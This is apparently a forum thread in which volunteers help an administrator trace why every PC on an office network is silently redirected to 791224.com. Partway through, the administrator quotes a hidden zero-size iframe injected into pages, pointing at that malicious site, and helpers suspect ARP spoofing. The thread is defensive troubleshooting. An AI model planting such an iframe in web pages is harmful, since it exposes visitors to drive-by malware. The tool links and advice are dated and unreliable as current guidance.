Attempting to go to Windows Update fails and freezes IE. Something to do with 791224.com (DON'T GO THERE) it will do to your PC whatever its done to my network.

sounds like some nasty spyware/spyware  that is linked into IE.
 I suggest downloading and running the free version of ad-aware (http://www.lavasoft.com/single/trialpay.php) just click the top download link to get the free version. Also grab a copy of spybot search and destroy. (http://safer-networking.org/en/index.html) as I tend to find they both pick up different things. - Running AV is great but they dont find the malware/ spyware very well.

Have you checked your host file to see if its been modified so your MS updates get redirected (c:\windows\system32\drivers\etc) open the hosts with note pad.

also try launching IE in safe mode and see if you still notice the same things happenning -
Run from the cmd prompt a "netstat -ano"  this will list the processes that are linked to the network activity. Check your task manager and turn on the column PID and see if you can match it up to a strange file or service thats running.

It also would help to grab a hijackthis log of one of the systems effected.
Let me know how you go with this,  

Cheers,
Phil

Thanks Phil!

I'll get started on your suggestions right now and repost the results.  I've tried a few other spyware scanners but haven't had any luck.  I'll try yours now.

Host file looked fine.

Checked the PID and went over the services but everything looked normal.

I'm about 1/3 of the way through the spyware scan with Search and Destroy.  As soon as its done I'll scan with the other one you suggested.

Tomorrow I'll try safemode.

Say goodbye to my weekend!

We can get a much better look at what is running on your computer if you run "HiJack This" (HJT) and post the log file.

Instructions below are copied from the post of one of our MalWare Experts (IndiGenus):

It would help if we could see what was going on with your computer. I suggest that you download, run, and upload a HijackThis log from the link below.

http://www.trendsecure.com/portal/en-US/threat_analytics/HJTInstall.exe

Click on "Do a system scan and save a log file" button. Post the text from the log file. Do not have HJT fix anything at this point.

Please do not post the log into the comment window. Use "Attach File" under the comment window to post the log.

Once we can examine the processes running, a complete removal plan can be created.

AV and Anti-spyware scans are not going to fix this problem.

Post back when you can.

Vic

Thank you for your your response. I ran Hijackthis and I'm attaching the log file like you requested.  Like you said, so far the spyware and virus scans haven't solved the problem.  I ran sysclean until it said no viruses found, but the problem remains.

I have many machines that are infected, but this log is from a 2003 Terminal Server.

Thanks for your help!!!
hijackthis.log

Hi,
I don't review HJT logs from many servers but I'm not seeing anything malicious there. Can you also post a HJT log from one or two of the suspect clients to see if there is anything local to the machine?

Dave

Yes, my Vista machine is infected as well.  Give me 5 minutes.

Here's the log file you requested.
hijackthis.log

Not seeing anything bad there either. I suggest running a full scan with Kaspersky to see if anything is found. Kaspersky is good, it won't fix anything by itself but is very thorough. You could upload the log it produces, just make sure to save it at the end.

Using Internet Explorer, run Kaspersky Online Scanner  
http://www.kaspersky.com/virusscanner
    * Click 'Accept' in the window that pops up.
    * You will be prompted to install an ActiveX component from Kaspersky, Click on the information bar and select Install ActiveX Control if so. This may happen more than once. That is OK. You also may get a warning from your Windows Firewall. You can tell it to unblock.
    * The program will launch and then start to download the latest definition files.
    * Once the scanner is installed and the definitions downloaded, click 'Next'.
    * Now click on 'Scan Settings'
    * In the scan settings make sure that the following are selected:
          o Scan using the following Anti-Virus database: 'Extended' (If available, otherwise 'Standard')
          o Scan Options: 'Scan Archives' and 'Scan Mail Bases'
    * Click 'OK'
    * Now under 'Select a target to scan' select 'My Computer'
    * The scan will take a while, so be patient and let it run. Once the scan is complete, it will display whether your system has been infected.
    * Now click on the 'Save Report As...' button:
    * Make sure it says Save as a text file - change it if not
    * Save the file to your desktop.
Upload the file for review.

Okay, I have it scanning now.  As soon as its done I'll post the results.

Also, I ran the two spyware tools listed early in the post.  They did find and remove instances, but the PC is still having the same behavior.

Here is the Kaspersky scan result.  It responded with:

Scan complete.
No malware has been detected. The sections that have been scanned are clean.
Kaspersky-Results.txt

Well this sure is an interesting one. I found a link to a thread over at Geeks2Go where the user ran Panda Active Scan and it appeared to solve the issue.
http://www.geekstogo.com/forum/Trojan-browser-hijacker-791224-com-t186733.html

I would recommend you try running it and see if it helps. It is unusual for Kaspersky to miss much...

http://www.pandasoftware.com/activescan/com/activescan_principal.htm

You bet it is!  I've done so many different scans that all say the system is clean.  But sure enough something is making it go to that malicious site.  I even tried installing Firefox to see if it was strictly a IE bug.  Firefox gets redirected to the site as well.

I saw that Geekstogo post also, but it seems that Kaspersky was there solution.  I'll try the Panda Scan.  So do you think I should just keep trying different scanning software.  I'm losing hope there just because I've done so many so far.

Microsoft suggested I call Trend Micro and have them custom design me a pattern file specifically for this.

Seems strange that I've been infected with malicious software that has literally has no MS patch, no pattern file that recognizes it and no experiences from others (excluding the one).  I don't like being the first on this one!

I'm open to any suggestions you can think of.  One more bit of info for you.  I tried logging into our new file server.  NO ONE has done any web surfing from this machine of course.  It has the latest Windows Updates as of 4 days ago.  It has the same problem as all the others.  Its as if a worm has spread across the network.  Although the behavior it exhibits smells like a Trojan.

Thanks.

Quote from G2G thread...

>""I ran a Panda ActiveScan through system and it seemed to fix the problem.""<

Even though the Panda scan didn't even appear to fix anything ... :scratches head:?

The Kaspersky online scanner will not fix anything it finds. Which doesn't matter as your case didn't find anything any way. Most of the stuff on that site appears to be Chinese....

I would at least give the PandaActive Scan a shot.

Also, let's get a little deeper scan also with DSS.

Download Deckard's System Scanner (DSS) and save it to your Desktop.

http://www.techsupportforum.com/sectools/Deckard/dss.exe

Close all other windows before proceeding.
Double-click on dss.exe and follow the prompts.
When it has finished, dss will open two Notepads. main.txt and extra.txt  --  Please upload the logs

Dave - I've been lurking here watching the posts.
I remember several years ago that the bad guys were targeting routers and other network devices. Have you seen any of that lately?
I also wonder if this can be some kind of DNS/other problem up the line from the workstations.

ammexit - you said that your HOSTS file looked fine, but has it been modified in any way?

Vic

I agree Vic. While no I have not seen anything like that I have been thinking along the same lines here. Might be a good idea to just go ahead and reset the HOSTS file also, just to make sure.

HostsXpert will reset the host file. It has many other useful functions too...
http://www.funkytoad.com/content/view/13/31/

Hey Guys,

The host file looked fine to me.  I didn't see any adjustments at all.  I can go ahead and reset them anyways.

Most of our users go through our ISA for browsing.  I thought that might be the offender, but the problem persists even if I bypass the ISA and go straight out our firewall (Watchguard Firebox).

Hey Ammexit, Sorry for the delay in getting back to you i've been working

When you check your host file again, Can you do me a favour and see if you can scroll down in the host file. Sometimes things are hidden in the bottom..

You said your running ISA, so are your also running your own internal dns?
What could have happened if your running your own DNS is that you may have had some malicious replication. Can you expand your dns entries to make sure that there arent any records or pointers overwriting the usual lookups.
One way to test this is to do a NSlookup from a cmd prompt for "update.microsoft.com" and advise what is returned. it should look something like this.

Non-authoritative answer:
Name:    www.update.microsoft.com.nsatc.net
Address:  207.46.209.124
Aliases:  update.microsoft.com, update.microsoft.com.nsatc.net
          www.update.microsoft.com

Can you also give me a copy of the netstat -ANO when you have IE or firefox open..
Id also like you to grab a copy of process explorer (http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx) so we can take a closer look at whats actually being called and run when you lauch IE or firefox, Mainly DLL's, You can expand the IE process and see exactly what it has linked to its process and kill them off to try and find the cause of the traffic redirection.

Let me know how you go with all these, in the meantime i'll take a look at your HijackThis logs.
Cheers,
Phil

This is good stuff, thanks Phil.  I'll do all your suggestions above and repost the results tonight, ASAP.

As for you DNS question.  Our domain controllers are setup with DNS forwarders to send all DNS requests that they cannot answer on to our ISP.

Thanks again.

please check your DC's DNS entries to make sure there isnt any crazy things happening.
Id also like you to use CCleaner to completely clean out your Temp internet files ( inc content.ie5, and index.dat files) http://www.ccleaner.com/download/

Once they are cleaned out, let me know if you still get the same issue.
Cheers,
Phil

whilst im in the mood for posting, Have you tried bypassing your proxy server. ?

Hi Copenphil,

I'll check my DC's DNS.  I'll also try going to a client and using a static IP of 4.2.2.2 for the DNS to see how it reacts.  I've cleaned out the internet files the traditional way, but I'll try your tool too.

Yes, my ISA server is acting as the proxy and I get the same results when I bypass it.

Thanks!

Hi Guys,

Here's some of the progress.

1.  I've double checked the host file and there are no discrepancies.

2.  I tried changing my client DNS from our DC's to 4.2.2.2.  The issue still exists.

3.  I did an NSlookup to update.microsoft.com.  Here is what came back:

Non-authoritative answer:
Name:     www.update.microsoft.com.nsatc.net
Address:     207.46.211.122
Aliases:     update.microsoft.com, update.microsoft.com.nsatc.net, www.update.microsoft.com

Something to take note of is, while update.microsoft.com doesn't work at all for me, I still see the hits to 791224.com when I'm browsing other sites.  For example, if I go to cnn.com.  Then go over to ISA and view the real-time monitor, I'll see multiple hits to 791224.com amidst the cnn.com hits.

I'm continuing with your other suggestions now and will repost shortly.

Here's the netstat -ano with IE open
netstat--ano.txt

Phil,

Here are the results from Process Explorer.
Results-from-Process-Explorer.txt

Phil,

I just ran ccleaner.  The issue is still there.

ammexit,
Random thoughts.
Do you have a notebook computer displaying these symptoms?
If so, take it to another environment (home?) and see if it is still being misdirected.

For me, MS updates resolves to 64.4.21.91 - can you browse to that IP in your Web Browser?

When you TRACERT/PING/NSLOOKUP "207.46.211.122" what does it resolve to?

When you TRACERT/PING/NSLOOKUP "64.4.21.91", what does it resolve to?

Vic

Vic,

You read my mind.  I just got back from the office with my PC when I read your post.  So, all the tests I was doing were from this PC.  Now with it in my home environment it is able to connect to update.microsoft.com just fine!

So I'm thinking I need to really dig deep into my domain controllers.  Do you agree?

Maybe I'm wrong, but I'm thinking that when I gave my PC a static DNS of 4.2.2.2 would have not used the DC's for DNS and been able to access update.microsoft.com just fine.  If my DC's are in fact causing the problem.  Would you agree with that?

I'll log in and play with the nslookups now.

Thanks.

Sorry for the delay - I had grandson duty for the past several hours.

Based on what you just posted, I would say that it has to be some kind of configuration problem - either your DC's or a router someplace. If your laptop works fine from home, there has to be something on/in the work network that is misdirecting it.

There was a time when I could probably have given you real advice, but I'm retired and haven't played on a real network for about 3 years.

If one of these other guys can help with that great - otherwise, you can post another question in the Network/Server/Router Zones detailing what you've learned so far.

I'll probably stand back and just watch, but I'll be rooting for you.

Vic

I've been troubleshooting the two DC's for the last couple hours.  Strange thing is this problem just showed its ugly face this last Friday, but the configs on the DC's and my router/firewall haven't been touched.

Also, if it is a config problem, its strange that the only website that won't load is Windows Update.  And why would a config problem point me to 791224.com, which just so happens to be a malicious site?

I'm just thinking out loud.  At least my PC is fine when I pull it out of the environment.  Its a start!!!

Thanks Vic.

Hey Guys,

Something to take note of.  So remember my office PC that kept hitting 791224.com no longer does this now that I've brought it home.  Now I logged into one of our Terminal Servers back at the office to check the source of a webpage, I did cnn.com.  The first line of the source reads

<iframe src=http://791224.com/ width=0 height=0 frameborder=0></iframe>

I did the same thing on my office PC that I brought home, it doesn't at that line to the source.  Strange that something in the network is adding that code to any webpage accessed by any PC in the network.  But those same PC's can be yanked out of that environment and be back to business as usual.

Something in the network is throwing in that line of code!!!

Can anyone make sense of this?  I'm attaching the Source from the CNN site.

Looking forward to your feedback.
www.cnn-1-.txt

I'm thinking a machine is doing some arp spoofing in the network.

Here's an update for those who my encounter this issue.

To find the infected PC I shut down all the clients and first confirmed that the redirecting behavior was no longer taking place, which it wasn't.  Then I went down the list and powered on individual PC's one at a time and checked to see if the malicious activity had returned after they booted up.  Strangely enough, the behavior never returned.

Its not clear to me what took place.  I'm working to make sense of it now.  I don't know of any arp spoofing virus that is resolved by rebooting so I'm not sleeping well yet.

I also noticed from Googling the malicious URL that others are starting to have a similar issue.

More to come.

by chance do you have a wireless network in your environment? a rouge AP? a machine with Peer Wireless enabled? These could all be used as an entrance point for the Arp Spoofing and the MITM (man in the middle)

Keep an eye on your logs, grab a copy of ethereal so we can monitor the packets on the lan and see where it's coming from.

Look forward to hearing your update.
Cheers,
Phil

whilst im at it, can you please remember to run windows updates on all your machines while its working!!

I have my WSUS Server pushing them out as we speak : )

Hey Phil,

Sorry, I didn't see your other post.  No, I don't have any wireless access setup.

Thanks.  Everythings been stable for the last few days.  I checked the ISA Server and we haven't had a single hit to the malicious site.

I'll keep my eye out for it!

kkick5742 - the fix for the malware you are describing has been out since last year. All of the major AV applications (even Symantec) will automatically clean that - no need for anyone to fool around with changing their current AV/anti-malware solutions.